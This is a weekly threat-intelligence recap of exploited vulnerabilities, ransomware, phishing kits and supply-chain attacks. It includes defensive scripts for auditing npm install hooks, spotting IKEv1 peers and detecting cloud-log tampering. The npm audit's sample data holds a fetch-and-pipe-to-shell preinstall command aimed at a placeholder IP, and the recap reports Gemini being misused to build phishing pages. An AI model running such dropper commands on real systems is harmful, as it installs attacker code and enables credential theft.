The cybersecurity landscape continues to be a battleground of innovation and exploitation, with attackers consistently finding new ways to leverage existing vulnerabilities and emerging technologies. This week’s recap highlights a series of concerning trends, from actively exploited zero-days in widely used software to the sophisticated abuse of phishing kits and AI-powered lures. The recurring theme is that the simplest oversights, like forgotten software and outdated protocols, remain potent entry points for malicious actors.
A critical Google Chrome zero-day, CVE-2026-11645, has been patched after being actively exploited in the wild. This vulnerability, an out-of-bounds memory access in Chrome’s V8 JavaScript engine, underscores the persistent threat of zero-day exploits and the speed at which they can be weaponized. This marks the fifth actively exploited Chrome zero-day this year, indicating a concerning trend in the exploitation of browser vulnerabilities.
Threats This Week: Exploited Vulnerabilities and Phishing Kits
The ShinyHunters gang has exploited a critical zero-day vulnerability (CVE-2026-35273) in Oracle PeopleSoft, a system used by numerous enterprises. The flaw, a missing-authentication weakness in a critical function, allows unauthenticated attackers to take complete control of PeopleSoft Enterprise PeopleTools. Exploitation was observed between late May and early June 2026, with attacks primarily targeting the higher education sector. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog, which requires federal civilian agencies to remediate it by the catalog's due date; everyone else should treat that as the floor, not the deadline.
Meanwhile, hundreds of Arch Linux packages have been compromised, allowing attackers to distribute a rootkit and a stealer through preinstall scripts. The malicious component, published to npm and dubbed “atomic-lockfile” by Sonatype, carries a Linux payload built for credential harvesting, stealth, and anti-debugging. The count of affected packages, originally around 400, has since surged to over 1,500. Arch Linux developers are actively removing the malicious commits.
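The mechanism in that story, a payload launched from an install-time script, is something you can audit for before it runs. The following is an added example, not code from the original article, Sonatype, or the Arch project: it walks package.json manifests (npm's reading of "preinstall", since the paragraph names npm), lists every package that declares an install-time lifecycle hook, and flags hooks whose command line looks like a dropper. The package names, versions, and commands are constructed for the example. The real mitigation, `npm install --ignore-scripts`, stops all hooks from running, which is why the audit is worth doing: you need to know which legitimate packages (native builds, for instance) actually depend on them.

```python
import json
from pathlib import Path
from typing import Dict, List, Optional

# Lifecycle hooks npm runs automatically during `npm install`. "preinstall" runs
# before anything else, which is why droppers favour it.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Substrings common in install-time droppers: fetch-and-pipe to a shell, decoding
# embedded blobs, staging in /tmp. A heuristic to sort the queue, not a verdict.
SUSPICIOUS_MARKERS = ("curl", "wget", "| sh", "| bash", "base64", "/tmp/", "chmod +x", "eval(")

# Constructed sample manifests; the names and versions are hypothetical.
SAMPLE_MANIFESTS: Dict[str, dict] = {
    "left-pad-clone": {"version": "1.0.0", "scripts": {"test": "jest"}},
    "build-helper": {"version": "2.3.1", "scripts": {"postinstall": "node-gyp rebuild"}},
    "evil-lockfile": {"version": "0.0.9", "scripts": {"preinstall": "curl -s http://203.0.113.7/x | sh"}},
    "quiet-one": {"version": "3.1.0", "scripts": {"install": "node setup.js"}},
}


def audit_manifest(name: str, manifest: dict) -> Optional[dict]:
    """Return a finding for a package that declares install-time hooks, else None."""
    scripts = manifest.get("scripts") or {}
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    if not hooks:
        return None
    markers = sorted({m for cmd in hooks.values() for m in SUSPICIOUS_MARKERS if m in cmd})
    return {
        "package": name,
        "version": manifest.get("version"),
        "hooks": hooks,
        "suspicious": bool(markers),
        "markers": markers,
    }


def audit_packages(manifests: Dict[str, dict]) -> List[dict]:
    """Audit every manifest; suspicious findings sort first, then alphabetical."""
    findings = []
    for name, manifest in manifests.items():
        finding = audit_manifest(name, manifest)
        if finding is not None:
            findings.append(finding)
    return sorted(findings, key=lambda f: (not f["suspicious"], f["package"]))


def load_manifests(node_modules: Path) -> Dict[str, dict]:
    """Collect package.json files under a node_modules tree (key = path relative to root)."""
    out: Dict[str, dict] = {}
    for pj in node_modules.rglob("package.json"):
        try:
            data = json.loads(pj.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or not JSON; skip rather than abort the audit
        if isinstance(data, dict):
            out[str(pj.parent.relative_to(node_modules))] = data
    return out


if __name__ == "__main__":
    # Swap SAMPLE_MANIFESTS for load_manifests(Path("node_modules")) on a real tree.
    for finding in audit_packages(SAMPLE_MANIFESTS):
        print(json.dumps(finding))
```

On a real project, diff the list of hook-bearing packages against the last known-good lockfile; a package that never had a preinstall hook and suddenly grows one is the signal, regardless of what the command looks like.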
Furthermore, a significant phishing-as-a-service (PhaaS) operation named Outsider has been dismantled by the FBI. The China-based operation was responsible for an estimated 3,870,000 stolen credit card records and substantial financial losses. Google revealed that Outsider operators weaponized its Gemini AI to generate fraudulent phishing pages and deploy massive smishing attacks impersonating legitimate brands. The service, costing as little as $88 per week, provided over 290 pre-built templates to steal credentials, multi-factor authentication codes, and financial information.
Check Point has also warned of active exploitation of a critical vulnerability (CVE-2026-50751) in its Remote Access VPN and Mobile Access deployments, specifically those configured with the deprecated IKEv1 protocol. The flaw allows unauthenticated attackers to bypass user authentication and establish unauthorized VPN connections. Exploitation, observed since early May, has been limited to a “few dozen targeted organizations globally” and has been associated with a Qilin ransomware affiliate in some instances. The practical prerequisite for the fix is knowing which peers still negotiate IKEv1 at all, since turning it off blindly breaks whatever legacy clients depend on it.
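Finding out who still speaks IKEv1 does not require vendor tooling: the ISAKMP header that both IKE versions share carries the version in its eighteenth byte (0x10 for IKEv1, 0x20 for IKEv2) and the exchange type in the nineteenth, so a packet capture on UDP/500 and UDP/4500 answers the question. The following is an added example, not Check Point code or anything from the original article: it parses that fixed 28-byte header (RFC 2408 for IKEv1, RFC 7296 for IKEv2), strips the 4-byte non-ESP marker that UDP-encapsulated IKE carries on port 4500 (RFC 3948), and tallies per source address which version is negotiated, calling out IKEv1 Aggressive Mode separately because it exposes the identity and hash in the clear. The flows are constructed for the example; the IP addresses are documentation ranges.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# ISAKMP / IKE fixed header: Initiator SPI, Responder SPI, Next Payload, Version
# (major nibble, minor nibble), Exchange Type, Flags, Message ID, Length. 28 bytes.
IKE_HDR = struct.Struct("!8s8sBBBBII")
IKE_HEADER_LEN = IKE_HDR.size

# Exchange types from RFC 2408/2409 (IKEv1) and RFC 7296 (IKEv2).
IKEV1_EXCHANGES = {1: "Base", 2: "Identity Protection (Main Mode)", 3: "Authentication Only",
                   4: "Aggressive", 5: "Informational", 32: "Quick Mode"}
IKEV2_EXCHANGES = {34: "IKE_SA_INIT", 35: "IKE_AUTH", 36: "CREATE_CHILD_SA", 37: "INFORMATIONAL"}
IKEV1_AGGRESSIVE = 4


@dataclass
class IkeHeader:
    major: int
    minor: int
    exchange_type: int
    exchange_name: str
    initiator_spi: bytes
    responder_spi: bytes
    flags: int
    message_id: int
    length: int


def parse_ike(payload: bytes, dst_port: int = 500) -> Optional[IkeHeader]:
    """Parse the IKE header from a UDP payload; None if the datagram is not IKE."""
    if dst_port == 4500:
        # UDP/4500 multiplexes ESP and IKE; IKE is prefixed with a zero non-ESP marker,
        # and an ESP SPI of zero is reserved, so this test is unambiguous.
        if len(payload) < 4 or payload[:4] != b"\x00\x00\x00\x00":
            return None
        payload = payload[4:]
    if len(payload) < IKE_HEADER_LEN:
        return None
    ispi, rspi, _next_payload, version, exch, flags, msg_id, length = IKE_HDR.unpack_from(payload)
    major, minor = version >> 4, version & 0x0F
    if major not in (1, 2):
        return None
    names = IKEV1_EXCHANGES if major == 1 else IKEV2_EXCHANGES
    return IkeHeader(major, minor, exch, names.get(exch, f"unknown({exch})"),
                     ispi, rspi, flags, msg_id, length)


def build_ike_header(major: int, exchange_type: int, ispi: bytes, rspi: bytes = bytes(8),
                     next_payload: int = 1, flags: int = 0, msg_id: int = 0,
                     length: Optional[int] = None) -> bytes:
    """Construct a header-only IKE datagram (used here to build the sample capture)."""
    return IKE_HDR.pack(ispi, rspi, next_payload, major << 4, exchange_type, flags, msg_id,
                        IKE_HEADER_LEN if length is None else length)


def triage(flows: List[Tuple[str, int, bytes]]) -> Dict[str, Dict[str, int]]:
    """Per source IP, count IKEv1, IKEv1 Aggressive Mode, and IKEv2 datagrams."""
    summary: Dict[str, Dict[str, int]] = {}
    for src_ip, dst_port, payload in flows:
        hdr = parse_ike(payload, dst_port)
        if hdr is None:
            continue
        entry = summary.setdefault(src_ip, {"ikev1": 0, "ikev1_aggressive": 0, "ikev2": 0})
        if hdr.major == 1:
            entry["ikev1"] += 1
            if hdr.exchange_type == IKEV1_AGGRESSIVE:
                entry["ikev1_aggressive"] += 1
        else:
            entry["ikev2"] += 1
    return summary


# Constructed sample "capture": (source IP, destination port, UDP payload).
SAMPLE_FLOWS: List[Tuple[str, int, bytes]] = [
    ("198.51.100.10", 500, build_ike_header(1, 4, ispi=b"\x11" * 8)),             # IKEv1 Aggressive
    ("198.51.100.10", 500, build_ike_header(1, 2, ispi=b"\x12" * 8)),             # IKEv1 Main Mode
    ("198.51.100.20", 500, build_ike_header(2, 34, ispi=b"\x21" * 8, next_payload=33, flags=0x08)),
    ("198.51.100.20", 4500, b"\x00\x00\x00\x00" + build_ike_header(
        2, 35, ispi=b"\x21" * 8, rspi=b"\x22" * 8, next_payload=46, flags=0x08, msg_id=1)),
    ("198.51.100.30", 4500, b"\xde\xad\xbe\xef" + bytes(40)),                    # ESP-in-UDP
    ("198.51.100.40", 500, b"short"),                                             # not IKE
]

if __name__ == "__main__":
    for src, counts in triage(SAMPLE_FLOWS).items():
        print(src, counts)
```

Feed it real datagrams by reading the UDP payloads out of a pcap (with scapy or dpkt, for instance) and the output is the list of peers to migrate before IKEv1 is switched off; any address showing Aggressive Mode goes to the top of that list.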
Microsoft has analyzed The Gentlemen ransomware operation, which it tracks as Phantom Mantis and which previously operated as an affiliate for groups such as LockBit and Qilin. The group has evolved from a closed ransomware crew into a ransomware-as-a-service (RaaS) provider that recruits its own affiliates. The Gentlemen operation has been active since March 2025 and has claimed 478 victims to date.
Trending Vulnerabilities and AI-Driven Attacks
The shrinking window between the release of a patch and its exploitation remains a critical concern. This week’s trending CVEs highlight the urgency for organizations to address vulnerabilities across various platforms, including Google Chrome (CVE-2026-11645), Check Point VPN (CVE-2026-50751), Oracle PeopleSoft (CVE-2026-35273), and numerous SAP products. The prevalence of SAP vulnerabilities, such as CVE-2026-44748 and CVE-2026-27671, underscores the need for diligent patching of enterprise resource planning (ERP) systems.
Microsoft has also issued a warning about cyber campaigns capitalizing on the global interest in artificial intelligence (AI) as a social engineering lure. These campaigns, spanning phishing, malvertising, and SEO-driven attacks, aim to steal credentials, facilitate financial fraud, or deploy malware. Examples include ChatGPT-themed lures leading to credit card data theft, Claude-themed phishing for credentials, and fake AI plugin installers distributing stealer malware. The initial access broker Storm-3075 has been observed using AI-themed malvertising to deliver payloads.
Additionally, macOS users are being targeted by deceptive installers for popular software, distributing information stealers. Threat actors use SEO poisoning and compromised links on torrent networks to trick users into downloading malicious DMG files. Over 65% of newly reported macOS malware in 2024 has been classified as infostealers, highlighting the growing threat to Apple’s ecosystem.
The illicit online marketplace scene continues to evolve, with Flare shedding light on the “guarantee model” that powers Telegram-based escrow services. These marketplaces, often rooted in legitimate Chinese consumer-internet trust architecture, facilitate transactions for money laundering, stolen data, and more. Despite law enforcement crackdowns, these criminal enterprises are fragmenting and adapting, with over 30 successor marketplaces emerging.
UniFi OS flaws (CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910) are being actively exploited, leading to remote code execution and the deployment of common malware. Meanwhile, a targeted cyber espionage campaign, Khmer Shadow, has been seen targeting Cambodian government entities with a custom loader dubbed NIGHTFORGE, leveraging advanced defense-evasion techniques.
Palo Alto Networks Unit 42 warns that attackers can turn cloud logging services against their owners: by tampering with logs or rerouting them to attacker-controlled accounts, an intruder blinds defenders, evades detection, and gains a persistent view into the target environment. API calls that stop, delete, narrow, or redirect a trail therefore deserve the same scrutiny as the activity the trail was meant to record.
Separately, Operation TaxShadow, an Indian tax-themed phishing campaign, is delivering a sophisticated multi-stage malware framework, manipulating victims with fraudulent tax notifications. The campaign uses a highly modular architecture with advanced defense-evasion techniques.
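The logging-abuse warning from Unit 42 above translates directly into a detection. The following is an added example, not Unit 42's or the original article's code: it runs over AWS CloudTrail-style records and flags the API calls that disable, delete, narrow, or redirect logging, escalating to high severity when a new log destination (a CloudWatch Logs subscription filter's destinationArn, or a trail's cloudWatchLogsLogGroupArn) lives in a different account from the one emitting the event, which is what "rerouting logs to an attacker-controlled account" looks like on the wire. The event names are real AWS API names; the severity ranking, the actor ARNs, IP addresses, and account IDs are constructed for the example. Failed calls (an errorCode field is present) are kept as findings, because a denied StopLogging still tells you someone tried.

```python
from typing import Dict, List, Optional

# AWS API calls that stop, delete, narrow, or redirect audit logging. The names are
# real; the baseline severity assigned to each is this example's own choice.
TAMPER_EVENTS: Dict[str, str] = {
    "StopLogging": "high",
    "DeleteTrail": "high",
    "UpdateTrail": "medium",
    "PutEventSelectors": "medium",
    "DeleteLogGroup": "high",
    "DeleteLogStream": "medium",
    "PutRetentionPolicy": "medium",
    "PutSubscriptionFilter": "medium",
    "DeleteFlowLogs": "high",
}

# Request parameters that are ARNs naming where logs will be sent from now on.
DESTINATION_ARN_PARAMS = ("destinationArn", "cloudWatchLogsLogGroupArn")


def arn_account(arn: str) -> Optional[str]:
    """Account ID of an ARN (arn:partition:service:region:account:resource), else None."""
    parts = arn.split(":")
    return parts[4] if len(parts) >= 6 and parts[4] else None


def analyze_event(event: dict) -> Optional[dict]:
    """Return a finding for a logging-tamper event, None for anything else."""
    name = event.get("eventName")
    if name not in TAMPER_EVENTS:
        return None
    severity = TAMPER_EVENTS[name]
    reasons = [f"{name} called"]
    home = event.get("recipientAccountId")
    params = event.get("requestParameters") or {}
    for key in DESTINATION_ARN_PARAMS:
        value = params.get(key)
        if not isinstance(value, str):
            continue
        other = arn_account(value)
        if other and home and other != home:
            severity = "high"  # logs are being pointed at somebody else's account
            reasons.append(f"{key} points at account {other}, not {home}")
    if event.get("errorCode"):
        reasons.append(f"call failed with {event['errorCode']} (attempt, not success)")
    return {
        "time": event.get("eventTime"),
        "actor": (event.get("userIdentity") or {}).get("arn"),
        "source_ip": event.get("sourceIPAddress"),
        "event": name,
        "severity": severity,
        "reasons": reasons,
    }


def analyze(events: List[dict]) -> List[dict]:
    return [f for f in (analyze_event(e) for e in events) if f is not None]


# Constructed sample events in CloudTrail's record shape; all identifiers are fictional.
SAMPLE_EVENTS: List[dict] = [
    {"eventTime": "2026-06-03T02:14:07Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "recipientAccountId": "111111111111",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ci-deploy/session"},
     "sourceIPAddress": "203.0.113.45",
     "requestParameters": {"name": "arn:aws:cloudtrail:us-east-1:111111111111:trail/org-trail"}},
    {"eventTime": "2026-06-03T02:15:30Z", "eventSource": "logs.amazonaws.com",
     "eventName": "PutSubscriptionFilter", "recipientAccountId": "111111111111",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ci-deploy/session"},
     "sourceIPAddress": "203.0.113.45",
     "requestParameters": {"logGroupName": "/aws/lambda/payments", "filterName": "export",
                           "destinationArn": "arn:aws:logs:us-east-1:999999999999:destination:sink"}},
    {"eventTime": "2026-06-03T09:00:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail", "recipientAccountId": "111111111111",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/secops"},
     "sourceIPAddress": "198.51.100.8",
     "requestParameters": {"name": "org-trail",
                           "cloudWatchLogsLogGroupArn": "arn:aws:logs:us-east-1:111111111111:log-group:trail:*"}},
    {"eventTime": "2026-06-03T09:01:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DescribeTrails", "recipientAccountId": "111111111111",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/secops"},
     "sourceIPAddress": "198.51.100.8", "requestParameters": None},
    {"eventTime": "2026-06-03T02:16:02Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DeleteTrail", "recipientAccountId": "111111111111",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ci-deploy/session"},
     "sourceIPAddress": "203.0.113.45", "errorCode": "AccessDenied",
     "requestParameters": {"name": "org-trail"}},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["time"], finding["actor"], "->", "; ".join(finding["reasons"]))
```

The same-account UpdateTrail from the secops user is reported at medium so an analyst can confirm it against a change ticket; the cross-account subscription filter and the StopLogging from a CI role at 02:14 are the ones that should page someone.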
A new Android trojan, MagicAd, has been found bypassing operating system restrictions to display background ads; it was distributed through Xiaomi’s GetApps store and the Samsung Galaxy Store.
Residential proxies continue to see a significant increase in usage, with monthly queries growing by approximately 25%. The rise is attributed to demand for AI training data gathered by web scraping, since residential proxies effectively bypass many anti-scraping measures.
The SHEET#CREEP campaign is distributing a C# remote access trojan (RAT) via a diplomatic-themed ISO phishing lure. The RAT uses the Google Sheets API as its command-and-control channel. Malware distributed via npm and PyPI packages remains a significant concern, with cryptocurrency-focused campaigns stealing wallet keys and credentials. A ransomware attack investigated by Huntress used Easyupload.io for data exfiltration, highlighting the reliance on simple file-sharing services.
Conclusion
The persistent exploitation of legacy systems, outdated protocols, and human error demonstrates that attackers do not require groundbreaking innovation to achieve success. The current threat landscape underscores the critical importance of maintaining robust security hygiene, including regular patching, diligent monitoring of known exploited vulnerabilities, and comprehensive security awareness training. The uncomfortable reality is that many organizations may already harbor latent vulnerabilities within their existing infrastructure, waiting for the opportune moment to be exploited. Organizations should remain vigilant and proactive in their security posture, as the next major incident could stem from a seemingly innocuous oversight.